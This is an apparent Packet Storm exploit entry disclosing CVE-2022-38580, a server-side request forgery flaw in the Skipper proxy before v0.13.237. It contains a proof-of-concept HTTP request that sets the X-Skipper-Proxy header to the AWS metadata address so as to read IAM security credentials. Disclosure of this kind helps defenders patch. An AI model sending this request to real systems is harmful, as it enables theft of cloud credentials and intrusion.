X-Skipper-Proxy 0.13.237 Server-Side Request Forgery

2023-03-2800:00:00

Milad Fadavvi, Hosein Vita

packetstormsecurity.com

111

server-side request forgery

x-skipper-proxy

vulnerability

cve-2022-38580

proof of concept

skipper

vendor homepage

exploit author

aws metadata

0.026 Low

EPSS

Percentile

90.4%

JSON

`#Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)  
#Date: 24/10/2022  
#Exploit Author: Hosein Vita & Milad Fadavvi  
#Vendor Homepage: https://github.com/zalando/skipper  
#Software Link: https://github.com/zalando/skipper  
#Version: < v0.13.237  
#Tested on: Linux  
#CVE: CVE-2022-38580  
  
  
Summary:  
  
Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of proxy to access the internal metadata server or other unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request.  
  
  
Proof Of Concept:  
  
1- Add header "X-Skipper-Proxy" to your request  
2- Add the aws metadata to the path  
  
GET /latest/meta-data/iam/security-credentials HTTP/1.1  
Host: yourskipperdomain.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36  
X-Skipper-Proxy: http://169.254.169.254  
Connection: close  
  
  
  
  
Reference:  
https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2  
  
`

0.026 Low

EPSS

Percentile

90.4%

JSON

Related for PACKETSTORM:171546